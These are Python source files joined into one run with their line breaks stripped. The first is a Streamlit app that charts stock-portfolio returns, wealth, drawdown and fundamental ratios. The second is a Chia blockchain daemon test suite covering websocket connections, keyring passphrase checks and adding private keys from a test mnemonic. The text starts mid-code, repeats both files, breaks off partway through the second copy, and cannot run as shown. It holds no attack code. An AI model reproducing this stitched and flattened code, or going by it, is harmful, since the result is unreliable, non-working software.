benchmark_names = ['^GSPC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) elif benchmark_option == 'Nasdaq Composite': benchmark_names = ['^IXIC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) else: benchmark_names = ['^GSPC', '^IXIC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) benchmark_returns = benchmark_return(benchmark_list_df, benchmark_names, initial_investment) #WEALTH PLOT# fig_wealth_plot = wealth_plot(day_returns,benchmark_returns) st.plotly_chart(fig_wealth_plot) st.markdown(export_plotly_image_link(fig_wealth_plot ,path_file="./output/wealth_plot.html"), unsafe_allow_html=True) #DF# cumulative_return = day_returns['Return_acumulado_total'].tail(1).values[0] / 100 annualized_return = ((1 + cumulative_return) ** (365 / day_returns.shape[0]) - 1) * 100 df = pd.DataFrame([[str(initial_investment)+"$", str(round(day_returns['Investment_acumulado_total'].tail(1).values[0],1))+"$", str(round(annualized_return,1))]], columns=['Initial investment ($)','Final investment ($)','Annualized return (%)']) col1,col2,col3 = st.columns((5,10,5)) with col2: st.write(df) #ACCUMULATED RETURN PLOT# fig_accumulated_return = accumulated_return_plot(day_returns, benchmark_returns) st.plotly_chart(fig_accumulated_return) st.markdown(export_plotly_image_link(fig_accumulated_return, path_file="./output/accumulated_return_plot.html"), unsafe_allow_html=True) #DRAWDAWN PLOT# fig_drawdawn = drawdawn_plot(day_returns, benchmark_returns) st.plotly_chart(fig_drawdawn) st.markdown(export_plotly_image_link(fig_drawdawn, path_file="./output/drawdawn_plot.html"), unsafe_allow_html=True) # DAY RETURNS# fig_day_returns = day_returns_plot(day_returns, benchmark_returns) st.plotly_chart(fig_day_returns) st.markdown(export_plotly_image_link(fig_day_returns, path_file="./output/day_returns_plot.html"), unsafe_allow_html=True) #ALLOCATION PLOT# fig_allocation = allocation_plot(day_returns) st.plotly_chart(fig_allocation) st.markdown(export_plotly_image_link(fig_allocation, path_file="./output/allocation_plot.html"), unsafe_allow_html=True) ##SAVE ALL## stocks_string = '' for stock in portfolio_companies: stocks_string = stocks_string + "_" + str(stock) path = "./output" path_file = f"./output/portfolio_{stocks_string}_{start_date}.html" if os.path.exists(path): save_all(path_file=path_file) else: os.makedirs(path) save_all(path_file=path_file)
#Libraries import base64 import datetime from io import BytesIO, StringIO import os import pandas as pd import streamlit as st import plotly import yfinance as yf from technical_analysis import download_data, portfolio_return, benchmark_return, wealth_plot,accumulated_return_plot, drawdawn_plot, allocation_plot, day_returns_plot from fundamental_analysis import market_cap, annual_financials, quarter_income_statement, calculate_ratios, market_cap_plot, bar_plot, line_plot #Downloader def export_plotly_image_link(fig,path_file): mybuff = StringIO() fig.write_html(mybuff, include_plotlyjs='cdn') mybuff = BytesIO(mybuff.getvalue().encode()) b64 = base64.b64encode(mybuff.read()).decode() #plotly.offline.plot(fig, filename=path_file, auto_open=False) href = f'<a href="data:text/html;charset=utf-8;base64, {b64}" download="{os.path.basename(path_file)}">Download plot</a>' return href def export_plotly_image_button(fig,path_file): plotly.offline.plot(fig, filename = path_file, auto_open=True) def save_all(path_file): with open(path_file, 'a') as f: f.write(fig_wealth_plot.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_accumulated_return.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_drawdawn.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_day_returns.to_html(full_html=False, include_plotlyjs='cdn')) f.write(fig_allocation.to_html(full_html=False, include_plotlyjs='cdn')) ######################STREAMLIT APP############## st.set_page_config(layout="wide",initial_sidebar_state='expanded',page_title="Stock Portfolio Tracker") st.write('<style>div.row-widget.stRadio > div{flex-direction:row;}</style>', unsafe_allow_html=True) st.write("# PORTFOLIO ANALYSIS ") ##################PROXY OPTION############### st.markdown("### Behind proxy server") proxy_option = st.radio(label='Proxy server', options=['No','Yes']) ##########TECHNICAL OR FUNDAMENTAL########### analysis_type = st.sidebar.radio("Choose an info type",('Technical', 'Fundamental')) ###PORTFOLIO COMPOSITION### st.markdown("### Select the stocks that will make up your portfolio") sp500 = pd.read_csv("./dat/all_tickers.csv")[['Symbol']] symbols = sp500['Symbol'].sort_values().tolist() big_fish = ['AAPL','AMZN','GOOGL','MSFT'] portfolio_companies = st.multiselect(label="Selected stocks", options = list(symbols), default=big_fish) ###BENCHMARK OPTIONALITY AND PORTFOLIO ALLOCATION### if analysis_type== 'Technical': ###DATE RANGE### today = datetime.date.today() min_value = today - datetime.timedelta(days=20000) before = today - datetime.timedelta(days=2555) start_date = st.sidebar.date_input('Start date', before, min_value=min_value) end_date = st.sidebar.date_input('End date', today, min_value=min_value) if start_date > end_date: st.sidebar.error('Error: End date must fall after start date.') ###INITIAL INVESTMENT### st.markdown("### Select your initial investment ($)") initial_investment = st.slider(label='Initial investment ($)', key='Initial investment', value=10_000, min_value=1_000, max_value=100_000, step=1_000) ###BENCHMARK OPTIONALITY### st.markdown("### Benchmark index") benchmark_option = st.radio(label='Benchmark', options=['None','S&P 500', 'Nasdaq Composite', 'Both']) ###PORTFOLIO ALLOCATION### st.sidebar.markdown("Do you want an equally balanced porfolio?") allocation = st.sidebar.selectbox('Select', ['Yes','No']) if len(portfolio_companies)>=1: if allocation=='Yes': company_weighs = [1 / len(portfolio_companies)] * len(portfolio_companies) else: st.sidebar.markdown("Select the percentage allocated to each company (%)") company_weigh_balanced = 1/len(portfolio_companies) company_weighs = [] for company in portfolio_companies: company_weigh = st.sidebar.number_input(company, value = company_weigh_balanced, min_value=0.0, max_value=1.0, step=0.01) company_weighs.append(company_weigh) else: pass ###APP## proxy_server = os.getenv('PROXY_SERVER') if st.button("Analyze portfolio",key='1'): if len(portfolio_companies)==0: st.warning("Introduce at least a company ticker") else: ########################################################FUNDAMENTAL################################### if analysis_type == "Fundamental": with st.spinner(text='In progress: it may take a few seconds.'): #####################################################DATA########################################################### ##### TICKERS ###### dict_tickers = {} for ticker in portfolio_companies: dict_tickers[ticker] = yf.Ticker(ticker) ######### MARKET CAPITALIZATION ############ df_market_cap = market_cap(dict_tickers, proxy_option) market_cap_columns = df_market_cap.loc[:, df_market_cap.columns.str.contains('Market_cap')].columns df_market_cap = df_market_cap[market_cap_columns] ######## QUARTER INCOME STATEMENT ############ df_quarter_income_statement,df_annual_income_statement_forecasted = quarter_income_statement(dict_tickers) ######### ANNUAL FINANCIALS ################ df_annual_financials = annual_financials(dict_tickers) df_annual_financials = pd.concat([df_annual_income_statement_forecasted,df_annual_financials]).reset_index(drop=['index']) df_annual_financials = pd.concat([df_annual_financials,df_market_cap],axis=1) df_annual_financials = df_annual_financials.fillna(method='bfill') ####### RATIOS ########################### df_complete_annual = calculate_ratios(df_annual_financials,dict_tickers) #st.write(df_complete_annual) #######################################################PLOTS############################################################# ##################MARKET CAP METRICS################ st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> MARKET CAP METRICS </h1>", unsafe_allow_html=True) fig_market_cap, dict_stock_color = market_cap_plot(df_complete_annual, period='Annually', substring="Market_cap", y_title="Market cap ($)", general_title="Market cap (B$) over time") st.plotly_chart(fig_market_cap) #################REVENUE METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> REVENUE METRICS </h1>", unsafe_allow_html=True) #REVENUE PLOT# fig_revenue_plot_annual = bar_plot(df_complete_annual, dict_stock_color=dict_stock_color,period = 'Annually', substring="Revenue",y_title="Revenue (B$)",general_title="Revenue (B$) over time") st.plotly_chart(fig_revenue_plot_annual) # REVENUE NORMALIZED PLOT# fig_normalized_revenue_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_revenue", y_title="Normalized revenue", general_title = "Normalized revenue since beginning of period") st.plotly_chart(fig_normalized_revenue_plot_annual) # P/S PLOT# fig_price_to_sales = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="P/S", y_title = "P/S multiple", general_title = "P/S since beginning of period") st.plotly_chart(fig_price_to_sales) #REVENUE GROWTH PLOT# #fig_growth_revenue_plot_annual = bar_plot(df_complete_annual, dict_stock_color = dict_stock_color, period='Annually', # substring="Growth_revenue", y_title="Revenue growth", general_title = "Revenue growth year-over-year") #st.plotly_chart(fig_growth_revenue_plot_annual) # REVENUE PLOT (QUARTER)# fig_revenue_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color, period='Quarterly', substring="Revenue", y_title="Revenue (B$)", general_title="Revenue (B$) over time") st.plotly_chart(fig_revenue_plot_quarter) ################GROSS PROFIT METRICS################# st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> GROSS PROFIT METRICS </h1>", unsafe_allow_html=True) # GROSS PROFIT PLOT# fig_gross_profit_plot_annual = bar_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Gross_profit", y_title="Gross profit ($)", general_title="Gross profit year-over-year") st.plotly_chart(fig_gross_profit_plot_annual) # GROSS PROFIT NORMALIZED PLOT# fig_normalized_gross_profit_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_gross_profit", y_title="Normalized gross profit", general_title="Normalized gross profit since beginning of period") st.plotly_chart(fig_normalized_gross_profit_plot_annual) # P/GROSS_PROFIT PLOT# fig_price_to_gross_profit = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="P/G", y_title="P/Gross profit multiple", general_title="P/Gross profit since beginning of period") st.plotly_chart(fig_price_to_gross_profit) # GROSS PROFIT GROWTH PLOT# #fig_growth_gross_profit_plot_annual = bar_plot(df_complete_annual, period='Annually', dict_stock_color=dict_stock_color, # substring="Growth_gross_profit", y_title="Gross profit growth", general_title="Gross profit growth year-over-year") #st.plotly_chart(fig_growth_gross_profit_plot_annual) # GROSS PROFIT PLOT (QUARTER)# fig_gross_profit_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color, period='Quarterly', substring="Gross_profit", y_title="Gross profit ($)", general_title="Gross profit quarter-over-quarter") st.plotly_chart(fig_gross_profit_plot_quarter) ##############NET INCOME METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> NET INCOME METRICS </h1>", unsafe_allow_html=True) #NET INCOME PLOT# fig_income_plot_annual = bar_plot(df_complete_annual, dict_stock_color = dict_stock_color, period='Annually', substring="Net_income",y_title="Net income ($)",general_title="Net income year-over-year") st.plotly_chart(fig_income_plot_annual) # NET INCOME NORMALIZED PLOT# fig_normalized_net_income_plot_annual = line_plot(df_complete_annual,dict_stock_color=dict_stock_color, period='Annually', substring="Normalized_net_income", y_title="Normalized net income",general_title = "Normalized net income since beginning of period") st.plotly_chart(fig_normalized_net_income_plot_annual) #P/E PLOT# fig_price_to_earnings = line_plot(df_complete_annual, dict_stock_color=dict_stock_color,period='Annually', substring="P/E", y_title = "P/E multiple", general_title="P/E since beginning of period") st.plotly_chart(fig_price_to_earnings) # NET INCOME GROWTH PLOT# #fig_growth_income_plot_annual = bar_plot(df_complete_annual, period='Annually', dict_stock_color=dict_stock_color, # substring="Growth_net_income", y_title="Net income growth", general_title="Net income growth year-over-year") #st.plotly_chart(fig_growth_income_plot_annual) # NET INCOME PLOT (QUARTER)# fig_income_plot_quarter = bar_plot(df_quarter_income_statement, dict_stock_color=dict_stock_color,period='Quarterly', substring="Net_income",y_title="Net income ($)",general_title="Net income quarter-over-quarter") st.plotly_chart(fig_income_plot_quarter) ############RESEARCH & DEVELOPMENT METRICS##### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> RESEARCH & DEVELOPMENT METRICS </h1>", unsafe_allow_html=True) #RESEARCH & DEVELOPMENT# fig_research_plot_annual = line_plot(df_complete_annual, dict_stock_color=dict_stock_color, period='Annually', substring="R&D/revenue", y_title="R&D/Revenue ratio", general_title="R&D/Revenue ratio year-over-year") st.plotly_chart(fig_research_plot_annual) ##############DEBT METRICS##################### st.markdown(f"<h1 style='text-align: center; color: #3E477F;'> DEBT METRICS </h1>", unsafe_allow_html=True) # CURRENT RATIO PLOT# fig_current_ratio = line_plot(df_complete_annual, period="Annually",dict_stock_color=dict_stock_color, substring="Current_ratio",y_title="Current ratio", general_title="Current ratio year-over-year") st.plotly_chart(fig_current_ratio) # DEBT-TO-EQUITY PLOT# fig_debt_to_equity = line_plot(df_complete_annual, period="Annually", dict_stock_color=dict_stock_color, substring="Debt/equity",y_title="Debt/Equity ratio", general_title="Debt/Equity ratio year-over-year") st.plotly_chart(fig_debt_to_equity) # DEBT-TO-EBIT PLOT# fig_debt_to_ebit = line_plot(df_complete_annual, period="Annually", dict_stock_color=dict_stock_color, substring="Debt/ebit", y_title="Debt/Ebit ratio", general_title="Debt/Ebit ratio year-over-year") st.plotly_chart(fig_debt_to_ebit) #stock = yf.Ticker("AYX") #if proxy_option == 'Yes': # stock.get_info(proxy = proxy_server) #else: # stock.get_info() #st.write(stock.major_holders) #st.write(stock.institutional_holders) #st.write(stock.recommendations) else: #1) Percentage allocation check if (sum(company_weighs)<= 0.99) | (sum(company_weighs) >= 1.01): st.warning("The sum of the percentages must be equal to 1") else: with st.spinner(text='In progress: it may take a few seconds.'): dict_of_df, min_dates, error_tickers = download_data(portfolio_companies, start_date, end_date, proxy_option) min_common_date = max(min_dates) #2) Date check delta_period = datetime.timedelta(5) late_symbols = [symbol for symbol in list(dict_of_df.keys()) if dict_of_df[symbol]['Date'].min()>start_date+delta_period] if start_date < min_common_date - delta_period: if len(late_symbols)==1: st.warning(f"The earliest common date for the portfolio is on the: {min_common_date.strftime('%d/%B/%Y')}. {late_symbols} was listed after the selected start date ({start_date}).") else: st.warning(f"The earliest common date for the portfolio is on the: {min_common_date.strftime('%d/%B/%Y')}. {late_symbols} were listed after the selected start date ({start_date}).") company_list_df = list(dict_of_df.values()) #3) Ticker check if len(error_tickers)!=0: #If one symbol is delisted or not found, nothing is shown. st.warning(f"{error_tickers} No data found, symbol may be delisted") else: day_returns = portfolio_return(company_list_df, portfolio_companies, initial_investment, company_weighs, start_date, end_date ) if benchmark_option == 'None': benchmark_returns = day_returns[['Date']] else: if benchmark_option == 'S&P 500': benchmark_names = ['^GSPC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) elif benchmark_option == 'Nasdaq Composite': benchmark_names = ['^IXIC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) else: benchmark_names = ['^GSPC', '^IXIC'] dict_of_benchmark,_,_ = download_data(benchmark_names, min_common_date, end_date, proxy_option) benchmark_list_df = list(dict_of_benchmark.values()) benchmark_returns = benchmark_return(benchmark_list_df, benchmark_names, initial_investment) #WEALTH PLOT# fig_wealth_plot = wealth_plot(day_returns,benchmark_returns) st.plotly_chart(fig_wealth_plot) st.markdown(export_plotly_image_link(fig_wealth_plot ,path_file="./output/wealth_plot.html"), unsafe_allow_html=True) #DF# cumulative_return = day_returns['Return_acumulado_total'].tail(1).values[0] / 100 annualized_return = ((1 + cumulative_return) ** (365 / day_returns.shape[0]) - 1) * 100 df = pd.DataFrame([[str(initial_investment)+"$", str(round(day_returns['Investment_acumulado_total'].tail(1).values[0],1))+"$", str(round(annualized_return,1))]], columns=['Initial investment ($)','Final investment ($)','Annualized return (%)']) col1,col2,col3 = st.columns((5,10,5)) with col2: st.write(df) #ACCUMULATED RETURN PLOT# fig_accumulated_return = accumulated_return_plot(day_returns, benchmark_returns) st.plotly_chart(fig_accumulated_return) st.markdown(export_plotly_image_link(fig_accumulated_return, path_file="./output/accumulated_return_plot.html"), unsafe_allow_html=True) #DRAWDAWN PLOT# fig_drawdawn = drawdawn_plot(day_returns, benchmark_returns) st.plotly_chart(fig_drawdawn) st.markdown(export_plotly_image_link(fig_drawdawn, path_file="./output/drawdawn_plot.html"), unsafe_allow_html=True) # DAY RETURNS# fig_day_returns = day_returns_plot(day_returns, benchmark_returns) st.plotly_chart(fig_day_returns) st.markdown(export_plotly_image_link(fig_day_returns, path_file="./output/day_returns_plot.html"), unsafe_allow_html=True) #ALLOCATION PLOT# fig_allocation = allocation_plot(day_returns) st.plotly_chart(fig_allocation) st.markdown(export_plotly_image_link(fig_allocation, path_file="./output/allocation_plot.html"), unsafe_allow_html=True) ##SAVE ALL## stocks_string = '' for stock in portfolio_companies: stocks_string = stocks_string + "_" + str(stock) path = "./output" path_file = f"./output/portfolio_{stocks_string}_{start_date}.html" if os.path.exists(path): save_all(path_file=path_file) else: os.makedirs(path) save_all(path_file=path_file)
import aiohttp import asyncio import json import logging import pytest import pytest_asyncio from chia.daemon.server import WebSocketServer from chia.server.outbound_message import NodeType from chia.types.peer_info import PeerInfo from tests.block_tools import BlockTools, create_block_tools_async from chia.util.ints import uint16 from chia.util.keyring_wrapper import DEFAULT_PASSPHRASE_IF_NO_MASTER_PASSPHRASE from chia.util.ws_message import create_payload from tests.core.node_height import node_height_at_least from tests.setup_nodes import setup_daemon, setup_full_system from tests.simulation.test_simulation import test_constants_modified from tests.time_out_assert import time_out_assert_custom_interval, time_out_assert from tests.util.keyring import TempKeyring @pytest_asyncio.fixture(scope="function") async def get_temp_keyring(): with TempKeyring() as keychain: yield keychain @pytest_asyncio.fixture(scope="function") async def get_b_tools_1(get_temp_keyring): return await create_block_tools_async(constants=test_constants_modified, keychain=get_temp_keyring) @pytest_asyncio.fixture(scope="function") async def get_b_tools(get_temp_keyring): local_b_tools = await create_block_tools_async(constants=test_constants_modified, keychain=get_temp_keyring) new_config = local_b_tools._config local_b_tools.change_config(new_config) return local_b_tools @pytest_asyncio.fixture(scope="function") async def get_daemon_with_temp_keyring(get_b_tools): async for daemon in setup_daemon(btools=get_b_tools): yield get_b_tools, daemon # TODO: Ideally, the db_version should be the (parameterized) db_version # fixture, to test all versions of the database schema. This doesn't work # because of a hack in shutting down the full node, which means you cannot run # more than one simulations per process. @pytest_asyncio.fixture(scope="function") async def simulation(bt, get_b_tools, get_b_tools_1): async for _ in setup_full_system( test_constants_modified, bt, b_tools=get_b_tools, b_tools_1=get_b_tools_1, connect_to_daemon=True, db_version=1, ): yield _ class TestDaemon: @pytest.mark.asyncio async def test_daemon_simulation(self, self_hostname, simulation, bt, get_b_tools, get_b_tools_1): node1, node2, _, _, _, _, _, _, _, _, server1, daemon1 = simulation node2_port = node2.full_node.config["port"] await server1.start_client(PeerInfo(self_hostname, uint16(node2_port))) async def num_connections(): count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items()) return count await time_out_assert_custom_interval(60, 1, num_connections, 1) await time_out_assert(1500, node_height_at_least, True, node2, 1) session = aiohttp.ClientSession() log = logging.getLogger() log.warning(f"Connecting to daemon on port {daemon1.daemon_port}") ws = await session.ws_connect( f"wss://127.0.0.1:{daemon1.daemon_port}", autoclose=True, autoping=True, heartbeat=60, ssl_context=get_b_tools.get_daemon_ssl_context(), max_msg_size=100 * 1024 * 1024, ) service_name = "test_service_name" data = {"service": service_name} payload = create_payload("register_service", data, service_name, "daemon") await ws.send_str(payload) message_queue = asyncio.Queue() async def reader(ws, queue): while True: msg = await ws.receive() if msg.type == aiohttp.WSMsgType.TEXT: message = msg.data.strip() message = json.loads(message) await queue.put(message) elif msg.type == aiohttp.WSMsgType.PING: await ws.pong() elif msg.type == aiohttp.WSMsgType.PONG: continue else: if msg.type == aiohttp.WSMsgType.CLOSE: await ws.close() elif msg.type == aiohttp.WSMsgType.ERROR: await ws.close() elif msg.type == aiohttp.WSMsgType.CLOSED: pass break read_handler = asyncio.create_task(reader(ws, message_queue)) data = {} payload = create_payload("get_blockchain_state", data, service_name, "chia_full_node") await ws.send_str(payload) await asyncio.sleep(5) blockchain_state_found = False while not message_queue.empty(): message = await message_queue.get() if message["command"] == "get_blockchain_state": blockchain_state_found = True await ws.close() read_handler.cancel() assert blockchain_state_found # Suppress warning: "The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8..." # Can be removed when we upgrade to a newer version of websockets (9.1 works) @pytest.mark.filterwarnings("ignore::DeprecationWarning:websockets.*") @pytest.mark.asyncio async def test_validate_keyring_passphrase_rpc(self, get_daemon_with_temp_keyring): local_b_tools: BlockTools = get_daemon_with_temp_keyring[0] keychain = local_b_tools.local_keychain # When: the keychain has a master passphrase set keychain.set_master_passphrase( current_passphrase=DEFAULT_PASSPHRASE_IF_NO_MASTER_PASSPHRASE, new_passphrase="the correct passphrase" ) async def check_success_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to True assert message["data"]["success"] is True async def check_bad_passphrase_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False async def check_missing_passphrase_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error string is set assert message["data"]["error"] == "missing key" async def check_empty_passphrase_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False async with aiohttp.ClientSession() as session: async with session.ws_connect( f"wss://127.0.0.1:{local_b_tools._config["daemon_port"]}", autoclose=True, autoping=True, heartbeat=60, ssl=local_b_tools.get_daemon_ssl_context(), max_msg_size=52428800, ) as ws: # When: using the correct passphrase await ws.send_str( create_payload("validate_keyring_passphrase", {"key": "the correct passphrase"}, "test", "daemon") ) # Expect: validation succeeds await check_success_case(await ws.receive()) # When: using the wrong passphrase await ws.send_str( create_payload("validate_keyring_passphrase", {"key": "the wrong passphrase"}, "test", "daemon") ) # Expect: validation failure await check_bad_passphrase_case(await ws.receive()) # When: not including the passphrase in the payload await ws.send_str(create_payload("validate_keyring_passphrase", {}, "test", "daemon")) # Expect: validation failure await check_missing_passphrase_case(await ws.receive()) # When: including an empty passphrase in the payload await ws.send_str(create_payload("validate_keyring_passphrase", {"key": ""}, "test", "daemon")) # Expect: validation failure await check_empty_passphrase_case(await ws.receive()) # Suppress warning: "The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8..." # Can be removed when we upgrade to a newer version of websockets (9.1 works) @pytest.mark.filterwarnings("ignore::DeprecationWarning:websockets.*") @pytest.mark.asyncio async def test_add_private_key(self, get_daemon_with_temp_keyring): local_b_tools: BlockTools = get_daemon_with_temp_keyring[0] daemon: WebSocketServer = get_daemon_with_temp_keyring[1] keychain = daemon.keychain_server._default_keychain # Keys will be added here test_mnemonic = ( "grief lock ketchup video day owner torch young work " "another venue evidence spread season bright private " "tomato remind jaguar original blur embody project can" ) test_fingerprint = 2877570395 mnemonic_with_typo = f"{test_mnemonic}xyz" # intentional typo: can -> canxyz mnemonic_with_missing_word = " ".join(test_mnemonic.split(" ")[:-1]) # missing last word async def check_success_case(response: aiohttp.http_websocket.WSMessage): nonlocal keychain # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to True assert message["data"]["success"] is True # Expect: the keychain has the new key assert keychain.get_private_key_by_fingerprint(test_fingerprint) is not None async def check_missing_param_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "malformed request" assert message["data"]["error"] == "malformed request" # Expect: error_details message is set to "missing mnemonic and/or passphrase" assert message["data"]["error_details"]["message"] == "missing mnemonic and/or passphrase" async def check_mnemonic_with_typo_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "'canxyz' is not in the mnemonic dictionary; may be misspelled" assert message["data"]["error"] == "'canxyz' is not in the mnemonic dictionary; may be misspelled" async def check_invalid_mnemonic_length_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "Invalid mnemonic length" assert message["data"]["error"] == "Invalid mnemonic length" async def check_invalid_mnemonic_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "Invalid order of mnemonic words" assert message["data"]["error"] == "Invalid order of mnemonic words" async with aiohttp.ClientSession() as session: async with session.ws_connect( f"wss://127.0.0.1:{local_b_tools._config["daemon_port"]}", autoclose=True, autoping=True, heartbeat=60, ssl=local_b_tools.get_daemon_ssl_context(), max_msg_size=52428800, ) as ws: # Expect the key hasn't been added yet assert keychain.get_private_key_by_fingerprint(test_fingerprint) is None await ws.send_str( create_payload("add_private_key", {"mnemonic": test_mnemonic, "passphrase": ""}, "test", "daemon") ) # Expect: key was added successfully await check_success_case(await ws.receive()) # When: missing mnemonic await ws.send_str(create_payload("add_private_key", {"passphrase": ""}, "test", "daemon")) # Expect: Failure due to missing mnemonic await check_missing_param_case(await ws.receive()) # When: missing passphrase await ws.send_str(create_payload("add_private_key", {"mnemonic": test_mnemonic}, "test", "daemon")) # Expect: Failure due to missing passphrase await check_missing_param_case(await ws.receive()) # When: using a mmnemonic with an incorrect word (typo) await ws.send_str( create_payload( "add_private_key", {"mnemonic": mnemonic_with_typo, "passphrase": ""}, "test", "daemon" ) ) # Expect: Failure due to misspelled mnemonic await check_mnemonic_with_typo_case(await ws.receive()) # When: using a mnemonic with an incorrect word count await ws.send_str( create_payload( "add_private_key", {"mnemonic": mnemonic_with_missing_word, "passphrase": ""}, "test", "daemon" ) ) # Expect: Failure due to invalid mnemonic await check_invalid_mnemonic_length_case(await ws.receive()) # When: using an incorrect mnemnonic await ws.send_str( create_payload( "add_private_key", {"mnemonic": " ".join(["abandon"] * 24), "passphrase": ""}, "test", "daemon" ) ) # Expect: Failure due to checksum error await check_invalid_mnemonic_case(await ws.receive())
import aiohttp import asyncio import json import logging import pytest import pytest_asyncio from chia.daemon.server import WebSocketServer from chia.server.outbound_message import NodeType from chia.types.peer_info import PeerInfo from tests.block_tools import BlockTools, create_block_tools_async from chia.util.ints import uint16 from chia.util.keyring_wrapper import DEFAULT_PASSPHRASE_IF_NO_MASTER_PASSPHRASE from chia.util.ws_message import create_payload from tests.core.node_height import node_height_at_least from tests.setup_nodes import setup_daemon, setup_full_system from tests.simulation.test_simulation import test_constants_modified from tests.time_out_assert import time_out_assert_custom_interval, time_out_assert from tests.util.keyring import TempKeyring @pytest_asyncio.fixture(scope="function") async def get_temp_keyring(): with TempKeyring() as keychain: yield keychain @pytest_asyncio.fixture(scope="function") async def get_b_tools_1(get_temp_keyring): return await create_block_tools_async(constants=test_constants_modified, keychain=get_temp_keyring) @pytest_asyncio.fixture(scope="function") async def get_b_tools(get_temp_keyring): local_b_tools = await create_block_tools_async(constants=test_constants_modified, keychain=get_temp_keyring) new_config = local_b_tools._config local_b_tools.change_config(new_config) return local_b_tools @pytest_asyncio.fixture(scope="function") async def get_daemon_with_temp_keyring(get_b_tools): async for daemon in setup_daemon(btools=get_b_tools): yield get_b_tools, daemon # TODO: Ideally, the db_version should be the (parameterized) db_version # fixture, to test all versions of the database schema. This doesn't work # because of a hack in shutting down the full node, which means you cannot run # more than one simulations per process. @pytest_asyncio.fixture(scope="function") async def simulation(bt, get_b_tools, get_b_tools_1): async for _ in setup_full_system( test_constants_modified, bt, b_tools=get_b_tools, b_tools_1=get_b_tools_1, connect_to_daemon=True, db_version=1, ): yield _ class TestDaemon: @pytest.mark.asyncio async def test_daemon_simulation(self, self_hostname, simulation, bt, get_b_tools, get_b_tools_1): node1, node2, _, _, _, _, _, _, _, _, server1, daemon1 = simulation node2_port = node2.full_node.config["port"] await server1.start_client(PeerInfo(self_hostname, uint16(node2_port))) async def num_connections(): count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items()) return count await time_out_assert_custom_interval(60, 1, num_connections, 1) await time_out_assert(1500, node_height_at_least, True, node2, 1) session = aiohttp.ClientSession() log = logging.getLogger() log.warning(f"Connecting to daemon on port {daemon1.daemon_port}") ws = await session.ws_connect( f"wss://127.0.0.1:{daemon1.daemon_port}", autoclose=True, autoping=True, heartbeat=60, ssl_context=get_b_tools.get_daemon_ssl_context(), max_msg_size=100 * 1024 * 1024, ) service_name = "test_service_name" data = {"service": service_name} payload = create_payload("register_service", data, service_name, "daemon") await ws.send_str(payload) message_queue = asyncio.Queue() async def reader(ws, queue): while True: msg = await ws.receive() if msg.type == aiohttp.WSMsgType.TEXT: message = msg.data.strip() message = json.loads(message) await queue.put(message) elif msg.type == aiohttp.WSMsgType.PING: await ws.pong() elif msg.type == aiohttp.WSMsgType.PONG: continue else: if msg.type == aiohttp.WSMsgType.CLOSE: await ws.close() elif msg.type == aiohttp.WSMsgType.ERROR: await ws.close() elif msg.type == 